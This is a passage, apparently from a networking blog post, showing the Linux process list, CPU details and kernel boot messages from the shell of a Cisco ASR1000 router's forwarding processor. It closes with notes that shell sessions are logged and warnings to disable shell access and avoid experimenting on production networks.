1 S root 63 5 0 75 -5 - 0 worker Jan19 ? 00:00:00 [aio/0]
1 S root 626 1 0 80 0 - 0 mtd_bl Jan19 ? 00:00:00 [mtdblockd]
1 S root 1361 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop0]
5 S bin 1395 1 0 80 0 - 555 sys_po Jan19 ? 00:00:03 portmap
1 S root 1434 1 0 60 -20 - 0 loop_t Jan19 ? 00:00:00 [loop1]
5 S root 2127 1 0 76 -4 - 528 select Jan19 ? 00:00:00 /sbin/udevd -d
1 S root 2817 1 0 90 10 - 0 jffs2_ Jan19 ? 00:00:00 [jffs2_gcd_mtd1]
5 S root 3110 1 0 80 0 - 467 syslog Jan19 ? 00:00:00 klogd -2
5 S root 3210 1 0 80 0 - 632 sys_po Jan19 ? 00:00:08 /usr/sbin/automount --timeout=60 /misc1 file /etc/auto.misc
5 S root 3225 1 0 80 0 - 864 select Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
5 S root 3227 1 0 80 0 - 864 select Jan19 ? 00:00:00 xinetd -stayalive -pidfile /var/run/xinetd_telnetd.pid -f /etc/xinetd_telnetd.conf
1 R root 3413 1 0 80 0 - 0 - Jan19 ? 00:01:47 [cavium]
4 S root 3956 1 0 80 0 - 1024 pipe_w Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/pvp.sh
0 S root 3991 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f pvp -p /tmp/fp/trace/fifo/pvp_sh%fp_0_0_3956_fifo
0 S root 4086 3956 0 80 0 - 508 select Jan19 ? 00:00:00 inotifywait -m --format %w,%-e,%f -e DELETE -e CREATE /tmp/fp/pvp/control /tmp/fp/pvp/process /tmp/fp/chasfs/pman
4 S root 4137 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4197 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/btrace_rotate_sh_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4137_fifo
0 S root 4208 1 0 80 0 - 465 read_c Jan19 ttyS0 00:00:00 /sbin/agetty -h console 9600 vt102
0 S root 4209 1 0 80 0 - 785 wait Jan19 ? 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 4211 1 0 80 0 - 1201 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/issu_switchover.sh
4 S root 4212 1 0 80 0 - 860 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
0 S root 4222 4209 0 80 0 - 864 select Jan19 ? 00:00:00 /usr/sbin/xinetd -f /tmp/etc/xinetd_brelay_eobc.conf -dontfork
4 S root 4249 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4297 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f oom -p /tmp/fp/trace/fifo/oom_sh%fp_0_0_4212_fifo
1 S root 4328 4212 0 80 0 - 864 wait Jan19 ? 00:00:00 /bin/bash /usr/binos/conf/oom.sh
0 S root 4354 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f inst_issu_switchover -p /tmp/fp/trace/fifo/issu_switchover_sh%fp_0_0_4211_fifo
0 S root 4361 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cman_fp_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4249_fifo
4 S root 4423 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 R root 4498 4249 0 80 0 - 6583 - Jan19 ? 00:36:34 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/cman_fp
0 S root 4548 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_cdm_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4423_fifo
4 S root 4622 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 S root 4674 4137 0 80 0 - 941 wait Jan19 ? 00:06:19 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/btrace_rotate.sh -f fp -s /tmp/fp/trace/stage -w /tmp/fp/trace -n 25 -t /tmp/rp/trace/stage
0 S root 4758 4423 0 80 0 - 93715 select Jan19 ? 00:00:00 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_cdm_svr -R
0 S root 4780 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_cp_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4622_fifo
0 S root 4792 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f btrace_rotate_sh -p /tmp/fp/trace/fifo/btrace_rotate_sh%fp_0_0_4674_fifo
4 S root 4824 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 4912 4622 14 80 0 - 163527 select Jan19 ? 1-21:51:02 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_cp_svr -R
0 S root 4926 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_driver_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4824_fifo
4 S root 4961 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5028 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_ha_top_level_server_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_4961_fifo
4 S root 5092 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5111 4211 0 80 0 - 507 select Jan19 ? 00:00:00 inotifywait -e moved_to /tmp/fp/chasfs/mastership
0 S root 5139 4824 2 80 0 - 95188 select Jan19 ? 07:07:13 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_driver -n0 -R -p 0
0 S root 5181 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/cpp_sp_svr_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5092_fifo
4 S root 5225 3956 0 69 -11 - 1014 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5358 5092 0 80 0 - 111174 select Jan19 ? 00:12:32 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_sp_svr -R
0 S root 5379 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/emd_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5225_fifo
0 S root 5425 4961 0 80 0 - 94367 select Jan19 ? 00:00:31 /tmp/sw/fp/0/0/fp/mount/usr/cpp/bin/cpp_ha_top_level_server 5
4 S root 5439 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5539 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/fman_fp_image_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5439_fifo
4 S root 5573 5225 0 80 0 - 4763 select Jan19 ? 00:08:16 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/emd
4 S root 5604 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
4 R root 5655 5439 8 80 0 - 171600 - Jan19 ? 1-03:29:15 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/fman_fp_image
0 S root 5710 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/hman_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5604_fifo
4 S root 5740 3956 0 69 -11 - 1015 wait Jan19 ? 00:00:00 /bin/bash /tmp/sw/fp/0/0/fp/mount/usr/binos/conf/pman.sh
0 S root 5827 1 0 80 0 - 2054 pipe_w Jan19 ? 00:00:00 /usr/bin/rotee -f /tmp/fp/trace/plogd_pmanlog -p /tmp/fp/trace/fifo/pman_sh%fp_0_0_5740_fifo
4 S root 5923 5604 0 80 0 - 4059 select Jan19 ? 00:15:26 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/hman
0 S root 5967 5740 0 80 0 - 3911 select Jan19 ? 00:00:11 /tmp/sw/fp/0/0/fp/mount/usr/binos/bin/plogd
4 S root 15571 1 0 80 0 - 763 hrtime 11:55 ? 00:00:00 /usr/bin/sntp -a -x 6 -l /var/lock/subsys/sntp.lock -f /var/lock/subsys/sntp.state rp-active
1 S root 16914 5 0 75 -5 - 0 worker 12:05 ? 00:00:00 [rpciod/0]
1 S root 16915 1 0 80 0 - 0 svc_re 12:05 ? 00:00:00 [lockd]
4 S root 17058 4222 0 80 0 - 940 wait 12:05 ? 00:00:00 /bin/bash /usr/binos/conf/in.telnetd.sh -L /usr/binos/conf/brelay.sh
4 S root 17121 17058 0 80 0 - 2224 select 12:05 ? 00:00:00 in.telnetd: rp0-0
0 S root 17122 17121 0 80 0 - 940 wait 12:05 ttyp0 00:00:00 /bin/bash /usr/binos/conf/brelay.sh -h rp0-0 -p
4 S binos 17185 17122 0 80 0 - 920 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/bexec.sh -c /usr/binos/conf/mcp_record_shell.sh -e BINOS_USER_NAME=?BINOS_USER_TTY=vty 0?BINOS_USER_UI_CLIENT=ios?
0 S binos 17188 17185 0 80 0 - 913 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_chvrf.sh eobc /usr/binos/conf/bexecute.sh -c /usr/binos/conf/mcp_record_shell.sh
4 S root 17189 17188 0 80 0 - 894 wait 12:05 ttyp0 00:00:00 /bin/sh /usr/binos/conf/mcp_record_shell.sh
0 S root 17201 17189 0 80 0 - 511 read_c 12:05 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_F0.log.20100201120551
1 S root 17202 17201 0 80 0 - 519 read_c 12:05 ttyp0 00:00:00 /usr/bin/script -q /harddisk/tracelogs/system_shell_F0.log.20100201120551
0 S root 17203 17202 0 80 0 - 800 wait 12:05 ttyp1 00:00:00 bash -i
0 S root 17380 4674 0 80 0 - 507 select 12:06 ? 00:00:00 inotifywait -t 60 -q -q /tmp/fp/trace/stage
0 S root 17383 4328 0 80 0 - 791 hrtime 12:06 ? 00:00:00 sleep 100
4 R root 17384 17203 0 80 0 - 794 - 12:06 ttyp1 00:00:00 ps -elf


Get the ESP CPU details (seems like a PowerQUICC III) :


[ASR1k_ESP_0:/]$ cat /proc/cpuinfo
processor : 0
cpu : e500v2
revision : 2.0 (pvr 8021 0020)
bogomips : 1196.03
chipset : 854xH-rev2
Vendor : Freescale Semiconductor
Machine : mpc854xH-rev2ads
clock : 1200MHz
PVR : 0x80210020
SVR : 0x80390020
PLL setting : 0x6
Memory : 4031 MB
bdec cnt : 0
bdec : 0
bdec tbu : 0
bdec tbl : 0


Anyone know a way get the QFP details?

Check the FP kernel messages :


[ASR1k_ESP_0:/]$ dmesg

SPRN_SVR is .. 3ff value 80390020
MCP processor type: 854xH-rev2 indx 3 mask ffff00f0 id 80390020 cur_ppc_sys_spec c02d4750
bootparam mstpbtp = 00000000
bootparam mstpPHY = 00000000
ASR1000: memory start: 00000000 size: 100000000
returning fbf00000
MCP: total_memory: fix fbf00000 max mem 0
Memory CAM mapping: CAM0=256Mb, CAM1=256Mb, CAM2=256Mb residual: 3263Mb
MCP: set_phys_avail: current total 30000000
Reserving init RAM from 00981000 for size 00fb8336
Reserving boot image from 00800000 - 00181000
mem_pieces_remove: bad overlap [fb9000,366d000) with [37a000, 7e0000) [fba336, 30000000)
ASR1000: removed 026b4000 from 00fb9000 virt c0fb9000 for isord
Linux version 2.6.18.8 (mcpre@mcp-bld-lnx-113) (gcc version 4.2.1) #1 Wed Nov 4 21:30:04 PST 2009
ioremap: return fdfff000 - virt fdfff000 phys 80000000 size 1000 flags 829d
ioremap: return fdffe000 - virt fdffe000 phys fbfe0000 size 1000 flags 829d
MCP:bdtype 20 20 subtype 2 mstp_svr 80390020 mask f0 != 10
ioremap: return fdefe000 - virt fdefe000 phys 81000000 size 100000 flags 829d
mcp_ccfp_reset() removed
mcp: FP FpRstCntrl reset scooby
ioremap: return fdefd000 - virt fdefd000 phys fbf00000 size 1000 flags 829d
MCP mcp85xx_setup_hose(): FP early mod lawar4 8000000c
MCP mpc85xx_setup_hose() ht_type = 2 pci_type = 8001
MCP mpc85xx_setup_hose() pci_type = 8001
mpc85xx_setup_hose pci
ioremap: return fdefc000 - virt fdefc000 phys fbf08000 size 1000 flags 829d
ioremap: return fdefb000 - virt fdefb000 phys fbf08000 size 1000 flags 829d
ioremap: return fdefa000 - virt fdefa000 phys fbfe0000 size 1000 flags 829d
potar1 000a8000 ear1 00000000 bar1 000a8000 ar1 8004400b
potar2 00000000 ear2 00000000 bar2 000a8001 ar2 8008800b
start 0 end a8000000 off a8000fff ios 0 ioe fff iob a8001000
mpc85xx_setup_hose pci io_base
ioremap: return fdef9000 - virt fdef9000 phys a8001000 size 1000 flags 829d
PCI Autoconfig: Found Bus 0, Device 17, Function 0
PCI Autoconfig: BAR 0x10, I/O, size=0x100, address=0xf00
PCI Autoconfig: BAR 0x18, I/O, size=0x100, address=0xe00
mpc85xx_setup_hose -- ht tbl 29c256e5
ioremap: return fdef8000 - virt fdef8000 phys fbf0b000 size 1000 flags 829d
mpc85xx_setup_hose--pci_init_resource()tbl 29c25849 c0000000 c01fffff
ioremap: return fdef7500 - virt fdef7000 phys fbf04500 size 1000 flags 829d
ioremap: return fdef6600 - virt fdef6000 phys fbf04600 size 1000 flags 829d
On node 0 totalpages: 1031936
DMA zone: 196608 pages, LIFO batch:31
HighMem zone: 835328 pages, LIFO batch:31
Built 1 zonelists. Total pages: 1031936
Kernel command line: root=/dev/ram rw console=ttyS0,9600 SR_BOOT=tftp:base_fp_00.pkg
ioremap: return fdeb6000 - virt fdeb6000 phys fbf40000 size 40000 flags 829d
mpc85xx_ads_init_IRQ() change opic_irq 53 from 1 to 3
mpc85xx_ads_init_IRQ() change opic_irq 54 from 1 to 3
OpenPIC Version 1.2 (1 CPUs and 114 IRQ sources) at fdeb6000
PID hash table entries: 4096 (order: 12, 16384 bytes)
Dentry cache hash table entries: 131072 (order: 7, 524288 bytes)
Inode-cache hash table entries: 65536 (order: 6, 262144 bytes)
ASR1000: mem_init() highmem_mapnr 30000 max_mapnr fbf00 mem_map c366d000
ASR1000: using mcp_memrsv_fp
ASR1000: resv 80000 - 87fff rem 32768
ASR1000: resv 90000 - 90010 rem 17
ASR1000: resv a8000 - a87ff rem 2048
ASR1000: resv a8800 - a8fff rem 2048
ASR1000: resv fbf00 - fc000
Memory: 3894564k available (2500k kernel code, 928k data, 132k init, 3193788k highmem)
Calibrating delay loop... 1196.03 BogoMIPS (lpj=598016)
Mount-cache hash table entries: 512
checking if image is initramfs... it is
ASR1000: NOT Freeing initrd memory: start c0981000 end c0fb8336 vtop c3680020 for 6364k freed
NET: Registered protocol family 16
PCI: Probing PCI hardware
PCI: scan skipped for hose c0381100
mpc85xx_pcibios_fixup() entered for MCP/RP
Registering openpic with sysfs...
ASR1000: htm init
MCP: reserved 01000000 from c6000000 or c6000000 virt 06000000 06000000 for htm. rsvpag 1000 start c372d000 end c374cfe0
MCP: lkern init
ASR1000: reserved 01000000 from 07000000 virt c7000000 lkern. rsvpag 1000 start c374d000 end c376cfe0
ASR1000: reserved 01000000 from 08000000 virt c8000000 lkern. rsvpag 1000 start c376d000 end c378cfe0
ASR1000: mcp_lkern_init() initrd_start c0981000 initrd_end c0fb8336 copy 7b8336 bytes from c0800000 to c7800000
ASR1000: lkern init. no free required.
ASR1000: lkern size for vcp is 007b8336
ASR1000: WARNING. Small vcp. Kernel core may not work.
HPAGE_SHIFT = 24
Generic PHY: Registered new driver
SCSI subsystem initialized
usbcore: registered new driver usbfs
usbcore: registered new driver hub
NET: Registered protocol family 2
IP route cache hash table entries: 32768 (order: 5, 131072 bytes)
TCP established hash table entries: 131072 (order: 7, 524288 bytes)
TCP bind hash table entries: 65536 (order: 6, 262144 bytes)
TCP: Hash tables configured (established 131072 bind 65536)
TCP reno registered
highmem bounce pool size: 64 pages
Total HugeTLB memory allocated, 0
JFFS2 version 2.2. (NAND) (C) 2001-2006 Red Hat, Inc.
io scheduler noop registered
io scheduler anticipatory registered (default)
io scheduler deadline registered
io scheduler cfq registered
PowerPC Book-E Watchdog Timer Loaded
Serial: 8250/16550 driver $Revision: 1.90 $ 2 ports, IRQ sharing disabled
serial8250.0: ttyS0 at MMIO 0xfbf04500 (irq = 26) is a 16550A
serial8250 baud from options 9600 setting uart to 9600 baud
serial8250.0: ttyS1 at MMIO 0xfbf04600 (irq = 26) is a 16550A
RAMDISK driver initialized: 16 RAM disks of 65536K size 1024 blocksize
loop: loaded (max 8 devices)
ioremap: return f105c520 - virt f105c000 phys fbf24520 size 1000 flags 829d
Gianfar MII Bus: probed
MCP: gfar_mdio_probe() dev c02d7360 new_bus c5800260, registered as MDIO bus
ioremap: return f105e000 - virt f105e000 phys fbf24000 size 1000 flags 829d
eth0: Gianfar Ethernet Controller Version 1.2, 00:00:02:00:00:00
eth0: Running with NAPI enabled
eth0: 256/256 RX/TX BD ring size
ioremap: return f1060000 - virt f1060000 phys fbf25000 size 1000 flags 829d
eth1: Gianfar Ethernet Controller Version 1.2, 00:00:02:00:00:01
eth1: Running with NAPI enabled
eth1: 256/256 RX/TX BD ring size
ioremap: return f1062000 - virt f1062000 phys fbf26000 size 1000 flags 829d
eth2: Gianfar Ethernet Controller Version 1.2, 00:00:00:00:00:00
eth2: Running with NAPI enabled
eth2: 256/256 RX/TX BD ring size
MCP: phy 1 feat 000002ff supported 000002f0 advert 000002f0
MCP: phy 2 feat 000002ff supported 000002f0 advert 000002f0
Marvell 88E1101: Registered new driver
Uniform Multi-Platform E-IDE driver Revision: 7.00alpha2
ide: Assuming 33MHz system bus speed for PIO modes; override with idebus=xx
physmap platform flash device: 01000000 at ff000000
ioremap: return f1080000 - virt f1080000 phys ff000000 size 1000000 flags 829d
physmap-flash.0: Found 1 x16 devices at 0x0 in 16-bit bank
Intel/Sharp Extended Query Table at 0x0031
cfi_cmdset_0001: Suspend erase on write disabled.
cfi_cmdset_0001: write suspend disabled
Using buffer write method
Extended Query version 1.1
Feature/Command Support: 00CA
- Chip Erase: unsupported
- Suspend Erase: supported
- Suspend Program: unsupported
- Legacy Lock/Unlock: supported
- Queued Erase: unsupported
- Instant block lock: unsupported
- Protection Bits: supported
- Page-mode read: supported
- Synchronous read: unsupported
- Simultaneous operations: unsupported
- Extended Flash Array: unsupported
Supported functions after Suspend: 00
- Program after Erase Suspend: unsupported
Block Status Register Mask: 0001
- Lock Bit Active: yes
- Lock-Down Bit Active: no
- EFA Lock Bit: no
- EFA Lock-Down Bit: no
Vcc Logic Supply Optimum Program/Erase Voltage: 3.3 V
erase region 0: offset=0x0,size=0x20000,blocks=128
cmdlinepart partition parsing not available
RedBoot partition parsing not available
Using physmap partition information
Creating 6 MTD partitions on "physmap-flash.0":
0x00000000-0x00a00000 : "Crashdump"
0x00a00000-0x00c00000 : "OBFL Data"
0x00c00000-0x00c20000 : "NVRAM Backup"
0x00c20000-0x00e00000 : "Upgrade Boot Rom"
0x00e00000-0x00e20000 : "NVRAM"
0x00e20000-0x01000000 : "Running Boot Rom"
ohci_hcd: 2005 April 22 USB 1.1 'Open' Host Controller (OHCI) Driver (PCI)
USB Universal Host Controller Interface driver v3.0
Initializing USB Mass Storage driver...
usbcore: registered new driver usb-storage
USB Mass Storage support registered.
i2c /dev entries driver
ioremap: return f1064000 - virt f1064000 phys fbf03000 size 1000 flags 829d
ioremap: return f1066100 - virt f1066000 phys fbf03100 size 1000 flags 829d
oprofile: using ppc/e500 performance monitoring.
TCP bic registered
NET: Registered protocol family 1
NET: Registered protocol family 17
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/rtc/hctosys.c: unable to open rtc device (rtc0)
Freeing unused kernel memory: 132k init
ioremap: return f2180000 - virt f2180000 phys 80000000 size 80000 flags 829d
rmonbifo_mod: module license 'Proprietary' taints kernel.
rmonbifo.ko loaded. 0.0.3 Date Nov 4 2009 21:29:47
Copyright (c) 2005-2009 by Cisco Systems, Inc.
piso.o loaded. 0.0.2 Date Nov 4 2009 21:29:47
Copyright (c) 2006-2007 by cisco Systems, Inc.
ASR1000: NOT Freeing initrd memory: start c0fb9000 end c366d000 vtop c368c720 for 39632k freed
ISO 9660 Extensions: RRIP_1991A
PowerPC Book-E Watchdog timer device opened at syspage time 14080
PowerPC Book-E Watchdog timer device opened at timebase time 704013154
PowerPC Watchdog starting at syspage time: 14256 with time base bit set to 33
PowerPC Watchdog starting at timebase time: 712849849 with time base bit set to 33
PowerPC Watchdog driver wrote 0xec0e0000 to SPRN_TCR register to set watchdog period of 33
PowerPC Book-E Watchdog Timer Enabled (wdt_period=33)
ISO 9660 Extensions: RRIP_1991A
htc.o loaded. 0.0.8 Date Nov 4 2009 21:29:02
Copyright (c) 2006-2007 by Cisco Systems, Inc. All rights reserved
htc: htc_setup_hose() ht_type = 2 pci_type = 0
htc: hose_ht from kernel: c0381100
mcpt.o loaded. 0.0.6 Date Nov 4 2009 21:28:49
Copyright (c) 2006-2009 by cisco Systems, Inc. All rights reserved
mcpt: mcp-fp sets mcpt_type to Scooby. Temporary.
ioremap: return f106a000 - virt f106a000 phys fbf20000 size 1000 flags 829d
ioremap: return f2160000 - virt f2160000 phys 90000000 size 10000 flags 829d
ioremap: return f106c000 - virt f106c000 phys fbf20000 size 1000 flags 829d
mcpt_mod.ko: mapped mstp_htp f106c000
ioremap: return f1068000 - virt f1068000 phys fbf02000 size 1000 flags 829d
ddr iomem = f1068000
ddr module loaded
PowerPC Book-E Watchdog timer device opened at syspage time 20254
PowerPC Book-E Watchdog timer device opened at timebase time 1012726660
lkrd.o loaded. 0.0.1 Date Nov 4 2009 21:29:18
Copyright (c) 2007 by cisco Systems, Inc.
ioremap: return f2600000 - virt f2600000 phys 80800000 size 130000 flags 829d
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/binos/i2c/cy2213/cy2213_main.c:cy2213_detect (line 327): resource is busyioremap: return f2780000 - virt f2780000 phys 81000000 size 100000 flags 829d
cpp_ecsr_base_p = f2780000
cpp_mod.o loaded. 2.0.1 Date Nov 4 2009 21:28:58
ioremap: return f106e000 - virt f106e000 phys 131fff000 size 1000 flags 829d
cpp_ppe_iic_reg_addr = f106e000
cpp_intr_mod.o loaded. 1.0.1 Date Nov 4 2009 21:29:00
cpp_spi_mod.o loaded. 1.0.1 Date Nov 4 2009 21:29:00
cpp_il_mod.o loaded. 1.0.1 Date Nov 4 2009 21:28:58
cpp_htdp_intr_mod.o loaded. 0.0.1 Date Nov 4 2009 21:28:58
ioremap: return f2210000 - virt f2210000 phys 80100000 size 8000 flags 829d
Scansta primary init with board type = 0x20
Regbase addr: 0xf2210000, Reg map size:0x00008000
mmem.o loaded. 0.0.3 Date Nov 4 2009 21:29:20
Copyright (c) 2006-2008 by cisco Systems, Inc. All rights reserved
PowerPC Book-E Watchdog timer device opened at syspage time 23757
PowerPC Book-E Watchdog timer device opened at timebase time 1187863346
PowerPC Book-E Watchdog timer device opened at syspage time 24472
PowerPC Book-E Watchdog timer device opened at timebase time 1223614176
scooby: udog: FD open
scooby: init_flags: 0x2
PCI: Enabling device 0000:00:11.0 (0000 -> 0001)
MCP N2 driver init with 18 cores, mask: 3ffff
/auto/mcpbuilds2/release/02.04.02/BLD-02.04.02/os/linux/drivers/binos/i2c/cy2213/cy2213_main.c:cy2213_ioctl (line 283): CY2213_IOCS_CONFIG: sent 00:00:03:41
CPP power up successful
CPP power up successful
htc: debug changed 400a0000
htc: htc_setup_hose() ht_type = 2 pci_type = 0
htc: hose_ht from kernel: c0381100
ioremap: return f220c000 - virt f220c000 phys fbf0b000 size 1000 flags 829d
ioremap: return f220e000 - virt f220e000 phys fbf00000 size 1000 flags 829d
htc: mcp-fp modified lawbar3 00100000:8020001f lawar4 8000000c
mpc85xx_setup_ht_gda() complete
PowerPC Book-E Watchdog timer device opened at syspage time 36275
PowerPC Book-E Watchdog timer device opened at timebase time 1813791509
PowerPC Book-E Watchdog time base bit set to 33 at syspage time 36276
PowerPC Book-E Watchdog time base bit set to 33 at timebase time 1813817323
cpp_htdp_mmap: remap_pfn_range range 0x46194000 - 0x46195000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x46195000 - 0x46196000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x46196000 - 0x4619F000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x4619F000 - 0x461A8000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461A8000 - 0x461A9000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461A9000 - 0x461B2000 pgoff 0x00000000 prot 0x00000297
cpp_htdp_mmap: remap_pfn_range range 0x461B2000 - 0x461B3000 pgoff 0x00000000 prot 0x00000297
cpp_spi_get_mode: RX=eSPI TX=eSPI
cpp_spi_mod[CPP_SPI_STATE]: state changed to ONLINE
cpp_spi_rx_phy_reset: SPI0
cpp_spi_enable: enable SPI0
cpp_spi_intrpt_enable: enable SPI0


Exit...


[ASR1k_ESP_0:/]$ exit
[ASR1k_RP_0:/]$ exit
Session log harddisk:tracelogs/system_shell_R0.log.20100201101531 closed.

ASR1k#


Everything you do while in shell, gets recorded in the above system_shell_x.log file, so you can use it for your reference at a later time.

Note : It's strongly recommended to disable shell access after you finish playing with it, unless you know what you're doing. You don't want to end up with someone messing up with your router.

WARNING : Everything above this line is being done at your own risk. You probably don't want to experiment on a production network and you'd better use this functionality only under supervision of Cisco Support.

I tried all kinds of text editing/parsing and everything worked fine. This seems like a nice way to decrease the time for the whole script edit/save/upload/test procedure. You just edit it online!

I still haven't tried installing any new tools, but i don't think there will be any major issues (at least for the basic ones). After all it's still a Linux box. Your fantasy is the only limit...

 
Creative Commons License
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License.
Creative Commons License
This work is licensed under a Creative Commons Attribution-Noncommercial-Share Alike 3.0 Greece License.